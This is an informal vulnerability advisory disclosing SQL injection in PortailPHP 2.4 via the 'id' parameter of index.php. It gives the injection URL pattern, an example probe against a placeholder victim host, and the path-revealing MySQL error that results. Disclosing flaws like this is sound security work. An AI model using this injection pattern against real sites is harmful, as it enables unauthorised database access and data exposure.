SQL IN PortailPHP
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: yes
Credit: ABDUCTER ---> ABDUCTER_MINDS@xxxxxxxxx [OR]
ABDUCTER_MINDS76@xxxxxxxxxxx
Vulnerable: PortailPHP 2.4 and all version
***************************************
info :- PortailPHP POWERFUL FORUM AND formal site http://www.portailphp.com/
there is sql in index.php
***************************************
discussion :- sql in indwx.php make an error in database and appear full path
informathion like
that (Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 34
in /home/httpd/vhosts/***/httpdocs/portailphp/mod_forum/read_mess.php on line
14)
****************************************
exploit:- index.php?affiche=Forum-read_mess&id=[sql]
example
www.victim.com/portailphp/index.php?affiche=Forum-read_mess&id='
*****************************************
CREDITS :- FOR ALL ARAB {EGYPT}
WWW.S4A.CC
TO MY LOVE (N0N0)